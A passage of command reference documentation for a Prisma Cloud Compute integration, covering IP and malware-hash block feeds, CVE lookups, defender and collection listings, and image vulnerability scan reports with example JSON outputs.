Process spawned/usr/bin/gawkcakeagent17411December 10, 2021 21:34:03 PMawk {gsub("%", "%%", $0);printf $1 "|" $2 "|" $3 "|" $4 "|" $5 "|" $6 "|" $11 ":::"}cron
Process spawned/bin/pscakeagent17410December 10, 2021 21:34:03 PMps auxcron
Process spawned/bin/grepcakeagent17407December 10, 2021 21:34:03 PMgrep -vE ^Filesystem|tmpfs|cdromcron

prisma-cloud-compute-console-version-info#


Get the console version.

Base Command#

prisma-cloud-compute-console-version-info

Requires Role#

ci

Input#

Argument NameDescriptionRequired

Context Output#

PathTypeDescription
PrismaCloudCompute.Console.VersionStringThe console version.

Command Example#

!prisma-cloud-compute-console-version-info

Context Example#

{
"PrismaCloudCompute": {
"Console": {
"Version": "21.04.439"
}
}
}

Human Readable Output#

Console version#

Version
21.04.439

prisma-cloud-compute-custom-feeds-ip-list#


Get all the blacklisted IP addresses in the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-list

Requires Role#

auditor

Input#

Argument NameDescriptionRequired

Context Output#

PathTypeDescription
PrismaCloudCompute.CustomFeedIP.digestStringAn internal digest of the custom IP feed.
PrismaCloudCompute.CustomFeedIP.feedStringThe list of blacklisted custom IP addresses.
PrismaCloudCompute.CustomFeedIP.modifiedDateThe last time the custom feed was modified.

Command Example#

!prisma-cloud-compute-custom-feeds-ip-list

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedIP": {
"feed": [
"2.2.2.2",
"1.1.1.1"
],
"modified": "December 10, 2021 21:12:32 PM",
"digest": "12345"
}
}
}

Human Readable Output#

IP Feeds#

ModifiedFeed
December 10, 2021 21:12:32 PM2.2.2.2,
1.1.1.1

prisma-cloud-compute-custom-feeds-ip-add#


Add a list of banned IP addresses to be blocked by the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-add

Requires Role#

operator

Input#

Argument NameDescriptionRequired
ipList of custom IP addresses to add to the banned IPs list that will be blocked. For example ip=1.1.1.1,2.2.2.2.Required

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-ip-add IP=1.1.1.1,2.2.2.2

Human Readable Output#

Successfully updated the custom IP feeds

prisma-cloud-compute-custom-feeds-malware-list#


List all custom uploaded md5 malwares.

Base Command#

prisma-cloud-compute-custom-feeds-malware-list

Requires Role#

auditor

Input#

Argument NameDescriptionRequired
limitThe maximum number of records of custom md5 malwares to return. Default is 50.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.CustomFeedMalware.digestStringAn internal digest of the feed.
PrismaCloudCompute.CustomFeedMalware.feed.md5StringThe md5 sum of the feed.
PrismaCloudCompute.CustomFeedMalware.feed.modifiedDateThe time the malware was added to the database.
PrismaCloudCompute.CustomFeedMalware.feed.nameStringThe name of the malware feed.
PrismaCloudCompute.CustomFeedMalware.modifiedDateThe last time the custom feed was modified.

Command Example#

prisma-cloud-compute-custom-feeds-malware-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedMalware": {
"feed": [
{
"md5": "md5_hash1",
"name": "first_md5_hash",
"allowed": false
},
{
"md5": "md5_hash2",
"name": "second_md5_hash",
"allowed": false
}
],
"modified": "December 09, 2021 13:31:38 PM",
"digest": "1234"
}
}
}

Human Readable Output#

Malware Feeds#

NameMd5Allowed
first_md5_hashmd5_hash1false
second_md5_hashmd5_hash2false

prisma-cloud-compute-custom-feeds-malware-add#


Add custom md5 malware hashes.

Base Command#

prisma-cloud-compute-custom-feeds-malware-add

Requires Role#

operator

Input#

Argument NameDescriptionRequired
nameThe name that will be attached to the md5 records.Required
md5Comma-separated list of md5 hashes to be added.Required

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-malware-add name=test md5=md5_hash1,md5_hash2,md5_hash3

Human Readable Output#

Successfully updated the custom md5 malware feeds

cve#


Get information about the CVEs in the system. Will return a maximum of 50 records. It is possible to query for a partial CVE description such as cve-2020 or cve-2014 or by severity/distro/package.

Base Command#

cve

Requires Role#

devOps

Input#

Argument NameDescriptionRequired
cveComma-separated list of CVEs, for example, cve=cve-2016-223,cve-2020-3546.Required

Context Output#

PathTypeDescription
CVE.IDStringThe ID of the CVE, for example: CVE-2015-1653
CVE.CVSSStringThe CVSS of the CVE, for example: 10.0
CVE.ModifiedDateThe timestamp of when the CVE was last modified.
CVE.DescriptionStringA description of the CVE.
DBotScore.IndicatorStringThe indicator value.
DBotScore.ScoreNumberThe indicator score.
DBotScore.TypeStringThe indicator type.
DBotScore.VendorStringThe vendor reporting the score of the indicator.
DBotScore.ReliabilityStringReliability of the source providing the intelligence data.

Command Example#

!cve cve=CVE-2021-4333

Context Example#

{
"DBotScore": [
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43332",
"Score": 0,
"Type": "cve"
},
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43337",
"Score": 0,
"Type": "cve"
}
],
"CVE": [
{
"ID": "CVE-2021-43331",
"CVSS": 6.1,
"Modified": "November 17, 2021 16:40:14 PM",
"Description": "In GNU Mailman before 2.1.36, a crafted URL to the Cgi/options.py user options page can execute arbitrary JavaScript for XSS."
},
{
"ID": "CVE-2021-43337",
"CVSS": 6.5,
"Modified": "November 18, 2021 08:40:01 AM",
"Description": "SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access."
}
]
}

Human Readable Output#

CVE-2021-43332#

CVSSDescriptionIDModified
6.1In GNU Mailman before 2.1.36, the CSRF token for the Cgi/admindb.py admindb page contains an encrypted version of the list admin password. This could potentially be cracked by a moderator via an offline brute-force attack.CVE-2021-43332November 19, 2021 08:40:01 AM

CVE-2021-43337#

CVSSDescriptionIDModified
6.5SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access.CVE-2021-43337November 18, 2021 08:40:01 AM

prisma-cloud-compute-defenders-list#


Retrieve a list of defenders and their information.

Base Command#

prisma-cloud-compute-defenders-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
clusterThe cluster name by which to scope the query.Optional
hostnameName of a specific defender to retrieve. Can be retrieved from !prisma-cloud-compute-profile-host-list.Optional
typeIndicates the defender types to return (e.g., docker, dockerWindows, cri, etc).Optional
connectedIndicates whether to return only connected defenders (true) or disconnected defenders (false). Possible values are: true, false.Optional
limitThe maximum number of defender records to return. Default is 20.Optional
offsetThe offset number by which to begin listing defenders and their information. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.DefenderDetails.categoryStringThe category of the defender type (host/container/serverless). Range of acceptable values: container, host, serverless, appEmbedded
PrismaCloudCompute.DefenderDetails.certificateExpirationDateThe client's certificate expiry time.
PrismaCloudCompute.DefenderDetails.cloudMetadataUnknownThe cloud provider metadata of the host.
PrismaCloudCompute.DefenderDetails.clusterStringCThe provided cluster name. (Fallback is internal IP address.)
PrismaCloudCompute.DefenderDetails.clusterIDStringThe unique ID generated for each daemon set and used to group defenders by clusters. Note - Kubernetes does not provide a cluster name as part of its API.
PrismaCloudCompute.DefenderDetails.compatibleVersionBooleanWhether the defender has a compatible version for communication (e.g. request logs).
PrismaCloudCompute.DefenderDetails.connectedBooleanWhether the defender is connected.
PrismaCloudCompute.DefenderDetails.featuresUnknownThe features that are enabled in the defender, such as listener type.
PrismaCloudCompute.DefenderDetails.firewallProtectionUnknownThe firewall protection status of app embedded defenders.
PrismaCloudCompute.DefenderDetails.fqdnStringThe fully qualified domain name used in audit alerts to identify specific hosts.
PrismaCloudCompute.DefenderDetails.hostnameStringThe defender hostname.
PrismaCloudCompute.DefenderDetails.lastModifiedDateThe last time the defender connectivity was modified.
PrismaCloudCompute.DefenderDetails.portNumberThe communication port between the defender and the console.
PrismaCloudCompute.DefenderDetails.proxyUnknownThe proxy options of the defender.
PrismaCloudCompute.DefenderDetails.remoteLoggingSupportedBooleanWhether the defender logs can be retrieved remotely.
PrismaCloudCompute.DefenderDetails.remoteMgmtSupportedBooleanWhether the defender can be remotely managed (upgrade, restart).
PrismaCloudCompute.DefenderDetails.statusUnknownThe feature status of the defender.
PrismaCloudCompute.DefenderDetails.systemInfoUnknownThe system information of the defender host.
PrismaCloudCompute.DefenderDetails.tasClusterIDStringThe ID used to identify the TAS cluster of the defender. Typically will be the cloud controller API address
PrismaCloudCompute.DefenderDetails.typeStringThe type of the defender (registry scanner/kubernetes node/etc...).
PrismaCloudCompute.DefenderDetails.versionStringThe agent version.

Command Example#

!prisma-cloud-compute-defenders-list connected=true limit=1

Context Example#

{
"PrismaCloudCompute": {
"DefenderDetails": {
"category": "container",
"cloudMetadata": {
"resourceID": "123",
"image": "image name",
"provider": "aws",
"type": "c5.xlarge",
"region": "aws region",
"accountID": "1234"
},
"hostname": "host1",
"features": {
"proxyListenerType": "none"
},
"compatibleVersion": true,
"lastModified": "September 02, 2021 11:05:08 AM",
"firewallProtection": {
"supported": false,
"enabled": false
},
"fqdn": "host1.lab.com",
"remoteMgmtSupported": true,
"status": {
"container": {
"scanTime": "2021-12-13T11:05:14.178Z",
"completed": true
},
"features": {
"err": ""
},
"process": {
"enabled": true,
"err": ""
},
"lastModified": "0001-01-01T00:00:00Z",
"appFirewall": {
"enabled": true,
"err": ""
},
"hostNetworkFirewall": {
"enabled": true,
"err": ""
},
"hostCustomCompliance": {
"err": ""
},
"filesystem": {
"enabled": true,
"err": ""
},
"runtime": {
"enabled": true,
"err": ""
},
"image": {
"scanTime": "2021-12-13T14:19:36.09Z",
"completed": true
},
"containerNetworkFirewall": {
"enabled": true,
"err": ""
},
"network": {
"enabled": true,
"err": ""
}
},
"version": "21.04.439",
"collections": [
"All",
"123"
],
"proxy": {
"httpProxy": "",
"ca": "",
"password": {
"encrypted": ""
},
"noProxy": "",
"user": ""
},
"systemInfo": {
"kernelVersion": "4.14.123-111.109.amzn2.x86_64",
"totalDiskSpaceGB": 199,
"cpuCount": 4,
"freeDiskSpaceGB": 180,
"memoryGB": 7.446006774902344
},
"connected": true,
"remoteLoggingSupported": true,
"type": "docker",
"port": 8084,
"certificateExpiration": "2024-09-01T11:00:00Z"
}
}
}

Human Readable Output#

Defenders Information#

HostnameVersionStatusListener
host121.04.439Connected since September 02, 2021 11:05:08 AMnone

prisma-cloud-compute-collections-list#


Retrieves a list of all collections.

Base Command#

prisma-cloud-compute-collections-list

Requires Role#

auditor

Input#

Argument NameDescriptionRequired
limitThe maximum number of records of collections to return. Default is 50.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Collection.accountIDsStringA list of the cloud account IDs
PrismaCloudCompute.Collection.appIDsStringA list of application IDs.
PrismaCloudCompute.Collection.clustersStringA list of Kubernetes cluster names.
PrismaCloudCompute.Collection.codeReposStringA list of remote code repositories.
PrismaCloudCompute.Collection.colorStringA color code associated with the collection.
PrismaCloudCompute.Collection.containersStringA list of containers that are associated with this collection.
PrismaCloudCompute.Collection.descriptionStringA free-text description of the collection.
PrismaCloudCompute.Collection.functionsStringA list of functions that are associated with this collection
PrismaCloudCompute.Collection.hostsStringA list of hosts that are associated with this collection
PrismaCloudCompute.Collection.imagesStringA list of images that are associated with this collection
PrismaCloudCompute.Collection.labelsStringA list of labels that are associated with this collection.
PrismaCloudCompute.Collection.modifiedDateThe timestamp if when the collection was last modified.
PrismaCloudCompute.Collection.nameStringA unique name associated with the collection.
PrismaCloudCompute.Collection.namespacesStringThe Kubernetes namespaces.
PrismaCloudCompute.Collection.ownerStringThe collection owner (the last user who modified the collection).
PrismaCloudCompute.Collection.systemBooleanWhether this collection was created by the system or by the user.

Command Example#

!prisma-cloud-compute-collections-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"Collection": {
"functions": [
"*"
],
"appIDs": [
"*"
],
"description": "System - all resources collection",
"color": "#602DFB",
"prisma": false,
"labels": [
"*"
],
"modified": "September 02, 2021 11:05:06 AM",
"system": true,
"owner": "system",
"hosts": [
"*"
],
"namespaces": [
"*"
],
"codeRepos": [
"*"
],
"images": [
"*"
],
"clusters": [
"*"
],
"accountIDs": [
"*"
],
"containers": [
"*"
],
"name": "All"
}
}
}

Human Readable Output#

Collections Information#

NameDescriptionOwnerModified
AllSystem - all resources collectionsystemSeptember 02, 2021 11:05:06 AM

prisma-cloud-compute-container-namespace-list#


Get the containers namespaces names.

Base Command#

prisma-cloud-compute-container-namespace-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
clusterComma-separated list of cluster names to filter the results by.Optional
collectionsComma-separated list of collections to filter the results by. Can be retrieved from !prisma-cloud-compute-collections-list.Optional
limitThe maximum number of namespace name records to return. Default is 50.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.RadarContainerNamespaceStringThe names of the container namespaces.

Command Example#

!prisma-cloud-compute-container-namespace-list limit=3

Context Example#

{
"PrismaCloudCompute": {
"RadarContainerNamespace": [
"namespace1",
"namespace2",
"namespace3"
]
}
}

Human Readable Output#

Collections Information#

Name
namespace1
namespace2
namespace3

prisma-cloud-compute-images-scan-list#


Get images scan report. The report includes vulnerabilities, compliance issues, binaries, etc.

Base Command#

prisma-cloud-compute-images-scan-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
clustersA comma-separated list of cluster names to filter the results by.Optional
compactWhether only minimal image data is to be returned (i.e., skip vulnerabilities, compliance, and extended image metadata). Possible values are: true, false. Default is true.Optional
fieldsA comma-separated list of fields to return. Possible values are labels, repo, registry, clusters, hosts, tag.Optional
hostnameA comma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list.Optional
idA comma-separated list of image IDs to filter the results by. Run !prisma-cloud-compute-images-scan-list without any arguments to get image IDs.Optional
nameA comma-separated list of image names to filter the results by.Optional
registryA comma-separated list of image registries to filter the results by.Optional
repositoryA comma-separated list of image repositories to filter the results by.Optional
compliance_idsA comma-separated list of compliance IDs to filter the results by.Optional
limit_recordThe maximum number of scan image records to return. Default is 10.Optional
limit_statsThe maximum number of compliance/vulnerability records to return. Default is 10.Optional
offsetThe offset by which to begin listing image scan results. Default is 0.Optional
all_resultsWhether to retrieve all results. The "limit_record" and "limit_stats" arguments will be ignored. More than 1,500 results will slow down the process. Possible values are: true, false. Default is false.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ReportsImagesScan._idStringImage identifier (image ID or repo:tag).
PrismaCloudCompute.ReportsImagesScan.allComplianceUnknownData regarding passed compliance checks.
PrismaCloudCompute.ReportsImagesScan.appEmbeddedBooleanWhether this image was scanned by an app-embedded defender.
PrismaCloudCompute.ReportsImagesScan.applicationsUnknownProducts in the image.
PrismaCloudCompute.ReportsImagesScan.baseImageStringThe base name of the image. Used when filtering the vulnerabilities by base images.
PrismaCloudCompute.ReportsImagesScan.binariesUnknownBinaries in the image.
PrismaCloudCompute.ReportsImagesScan.cloudMetadataUnknownThe metadata for an instance running in a cloud provider (AWS/GCP/Azure).
PrismaCloudCompute.ReportsImagesScan.clustersStringCluster names.
PrismaCloudCompute.ReportsImagesScan.collectionsStringCollections to which this result applies.
PrismaCloudCompute.ReportsImagesScan.complianceDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportsImagesScan.complianceIssuesUnknownNumber of compliance issues.
PrismaCloudCompute.ReportsImagesScan.complianceRiskScoreNumberCompliance risk score for the image.
PrismaCloudCompute.ReportsImagesScan.creationTimeDateDate/time when the image was created.
PrismaCloudCompute.ReportsImagesScan.distroStringFull name of the distribution.
PrismaCloudCompute.ReportsImagesScan.ecsClusterNameStringElastic Container Service (ECS) cluster name.
PrismaCloudCompute.ReportsImagesScan.errStringDescription of an error that occurred during the image health scan.
PrismaCloudCompute.ReportsImagesScan.externalLabelsUnknownKubernetes external labels of all containers running this image.
PrismaCloudCompute.ReportsImagesScan.filesUnknownFiles in the container.
PrismaCloudCompute.ReportsImagesScan.firewallProtectionUnknownThe status of the Web-Application and API Security (WAAS) protection.
PrismaCloudCompute.ReportsImagesScan.firstScanTimeDateDate/time when this image was first scanned (preserved during version updates).
PrismaCloudCompute.ReportsImagesScan.historyUnknownDocker image history.
PrismaCloudCompute.ReportsImagesScan.hostDevicesStringMap from host network device name to IP address.
PrismaCloudCompute.ReportsImagesScan.hostnameStringName of the host that was scanned.
PrismaCloudCompute.ReportsImagesScan.hostsUnknownA fast index for image scan results metadata per host.
PrismaCloudCompute.ReportsImagesScan.idStringImage ID.
PrismaCloudCompute.ReportsImagesScan.imageUnknownA container image.
PrismaCloudCompute.ReportsImagesScan.installedProductsUnknownData regarding products running in the environment.
PrismaCloudCompute.ReportsImagesScan.instancesUnknownDetails about each occurrence of the image (tag + host).
PrismaCloudCompute.ReportsImagesScan.k8sClusterAddrStringEndpoint of the Kubernetes API server.
PrismaCloudCompute.ReportsImagesScan.labelsStringImage labels.
PrismaCloudCompute.ReportsImagesScan.layersStringImage's filesystem layers. Each layer is a SHA256 digest of the filesystem diff.
PrismaCloudCompute.ReportsImagesScan.missingDistroVulnCoverageBooleanWhether the image operating system is covered in the IS (true) or not (false).
PrismaCloudCompute.ReportsImagesScan.namespacesStringKubernetes namespaces of all the containers running this image.
PrismaCloudCompute.ReportsImagesScan.osDistroStringName of the operating system distribution.
PrismaCloudCompute.ReportsImagesScan.osDistroReleaseStringOperating system distribution release.
PrismaCloudCompute.ReportsImagesScan.osDistroVersionStringOperating system distribution version.
PrismaCloudCompute.ReportsImagesScan.packageManagerBooleanWhether the package manager is installed for the operating system.
PrismaCloudCompute.ReportsImagesScan.packagesUnknownPackages that exist in the image.
PrismaCloudCompute.ReportsImagesScan.registryNamespaceStringIBM cloud namespace to which the image belongs.
PrismaCloudCompute.ReportsImagesScan.repoDigestsStringDigests of the image. Used for content trust (notary). Has one digest per tag.
PrismaCloudCompute.ReportsImagesScan.repoTagUnknownAn image repository and its associated tag or registry digest.
PrismaCloudCompute.ReportsImagesScan.rhelReposStringThe (RPM) repositories IDs from which the packages in this image were installed. Used for matching vulnerabilities by Red Hat CPEs.
PrismaCloudCompute.ReportsImagesScan.riskFactorsUnknownThe mapping of the existence of vulnerability risk factors.
PrismaCloudCompute.ReportsImagesScan.scanIDStringScan ID.
PrismaCloudCompute.ReportsImagesScan.scanTimeDateDate/time of the last scan of the image.
PrismaCloudCompute.ReportsImagesScan.scanVersionStringDefender version that published the image.
PrismaCloudCompute.ReportsImagesScan.startupBinariesUnknownBinaries that are expected to run when the container is created from this image.
PrismaCloudCompute.ReportsImagesScan.tagsUnknownTags associated with the given image.
PrismaCloudCompute.ReportsImagesScan.topLayerStringSHA256 of the image's last layer that is the last element of the Layers field.
PrismaCloudCompute.ReportsImagesScan.trustResultUnknownAn aggregated image trust result.
PrismaCloudCompute.ReportsImagesScan.trustStatusStringThe trust status for an image.
PrismaCloudCompute.ReportsImagesScan.twistlockImageBooleanWhether the image is a Twistlock image (true) or not (false).
PrismaCloudCompute.ReportsImagesScan.typeUnknownThe scanning type performed.
PrismaCloudCompute.ReportsImagesScan.vulnerabilitiesUnknownCVE vulnerabilities of the image.
PrismaCloudCompute.ReportsImagesScan.vulnerabilitiesCountNumberTotal number of vulnerabilities.
PrismaCloudCompute.ReportsImagesScan.vulnerabilityDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportsImagesScan.vulnerabilityRiskScoreNumberImage's CVE risk score.
PrismaCloudCompute.ReportsImagesScan.wildFireUsageUnknownThe Wildfire usage stats. The period for the usage varies with the context.
PrismaCloudCompute.ReportsImagesScan.complianceIssuesCountNumberNumber of compliance issues.

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=false

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
"complianceIssues": [
{
"templates": [
"PCI",
"DISA STIG"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 41,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 4.1) Image should be created with a non-root user",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "It is a good practice to run the container as a non-root user, if possible. Though user\nnamespace mapping is now available, if a user is already defined in the container image, the\ncontainer is run as that user by default and specific user namespace remapping is not\nrequired",
"link": "",
"cri": false,
"riskFactors": null,
"type": "image",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": true,
"repoDigests": [
"demisto/python@sha256:0bfa24a116efb99c51076ee3801ee8de80e5998a0f85522599c7036dea8a67f1"
],
"id": "image123",
"layers": [
"sha256:04a094fe844e055828cb2d64ead6bd3eb4257e7c7b5d1e2af0da89fa20472cf4",
"sha256:b901e62fe587b147e801712b7833942a540492af8f67cc683ac5a3b7bcbf7eda",
"sha256:240070abd5cc482cbe83e70710e9c161105bf1b69fc4551ceedac541aec1e552",
"sha256:08ed7077578e63f32e98ec38644705d67aec68661663cfa43e7e771f37ac781b",
"sha256:25f89c88aa30915565de42481044fdc3edcde2edcd88c32098b16adbe09c65ec",
"sha256:607e311316ef7ea1437fe4b8f7a6f04f9a61b0f21e2d4ee0611c05bd1d245ff7",
"sha256:21511d4e2cf5964090236c3db6aa38c23f8937aab18226dd1898ef4346fa9a3c",
"sha256:9ec31cab0619e95e88291cd611370e4d0f61d540862496b89eed00845d48a3a8",
"sha256:ce388cb57837216290c2ec5c33ee70ff50ee70a479fdc401f9170f278e68c15d",
"sha256:887b26e25244256638869a154e4b7427f124a1ef64723ea7082096025e7f1520",
"sha256:40c6aaccab9bea3953dfa459e3426d0f8a23fda23ec5495404ae21afa94af475",
"sha256:082ca23ed20f62157e6b3958ed4899fccd6de2501468f668874d746f0af1bc69",
"sha256:e252153001780e97deed131418ef8ed0ad8176f55e14916a338120cc8a464af8",
"sha256:11f9d19047c7dfc84742694c7c7db04ceb346bf60e44a8a28947937aa3408ba2",
"sha256:1945710968a74b7692f635829f9dac189df097b8f7d135aa51f6726dccb2a2be",
"sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6"
],
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "busybox",
"version": "1.27.2-r8",
"cveCount": 450,
"license": "GPL2",
"layerTime": 1525948365
},
{
"name": "apk-tools",
"version": "2.9.1-r2",
"cveCount": 25,
"license": "GPL2",
"layerTime": 1512154128
}
]
},
{
"pkgsType": "python",
"pkgs": [
{
"name": "python",
"version": "2.7.14",
"cveCount": 65,
"license": "PSF license",
"layerTime": 1513722622
},
{
"name": "certifi",
"version": "2017.11.5",
"cveCount": 0,
"license": "MPL-2.0",
"layerTime": 1515337812
}
]
}
],
"complianceDistribution": {
"high": 1,
"total": 1,
"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [
{
"path": "/usr/local/bin/python2.7",
"cveCount": 0,
"name": "python",
"md5": "dc8c57a9674d54da18637ffea29eeaba"
}
],
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": [],
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 26,
"path": "/bin/busybox",
"version": "1.27.2",
"layerTime": 1525948355,
"name": "busybox"
}
],
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "3.7.0",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.30.0"
],
"severity": "high",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 7.5,
"status": "fixed in 1.30.1-r5",
"twistlock": false,
"fixDate": "January 09, 2019 16:29:00 PM",
"description": "An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-20679",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"High severity": {},
"Attack vector: network": {},
"Has fix": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1547051340,
"cve": "CVE-2018-20679"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.29.0"
],
"severity": "critical",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 9.8,
"status": "fixed in 1.29.3-r10",
"twistlock": false,
"fixDate": "June 26, 2018 16:29:00 PM",
"description": "BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000517",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Attack vector: network": {},
"Has fix": {},
"Critical severity": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1530030540,
"cve": "CVE-2018-1000517"
}
],
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": [
{
"path": "/bin/busybox",
"version": "1.27.2",
"cveCount": 0,
"name": "busybox",
"md5": "17890907c72a9aa14c5580faf4f6a30a"
},
{
"path": "/sbin/apk",
"cveCount": 0,
"name": "apk",
"md5": "8f77c14fa2ab4f668f6af4bfa3e12587"
}
],
"vulnerabilityRiskScore": 12282000,
"history": [
{
"sizeBytes": 4143684,
"instruction": "ADD file:2b00f26f6004576e2f8faeb3fb0517a14f79ea89a059fe096b54cbecf5da512e in / ",
"emptyLayer": false,
"id": "<missing>",
"created": 1512154128
},
{
"instruction": "CMD [\"/bin/sh\"]",
"emptyLayer": true,
"id": "<missing>",
"created": 1512154128
}
]
}
}
}

Human Readable Output#

Image description#

IDImageOS DistributionVulnerabilities CountCompliance Issues Count
image123demisto/python:1.3-alpineAlpine Linux v3.7601

Vulnerabilities#

CveDescriptionSeverityPackage NameStatusFix Date
CVE-2018-20679An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes.highbusyboxfixed in 1.30.1-r5January 09, 2019 16:29:00 PM
CVE-2018-1000517BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e.criticalbusyboxfixed in 1.29.3-r10June 26, 2018 16:29:00 PM

Compliances#

IdSeverityDescription
41highIt is a good practice to run the container as a non-root user, if possible. Though user
namespace mapping is now available, if a user is already defined in the container image, the
container is run as that user by default and specific user namespace remapping is not
required

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=true

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
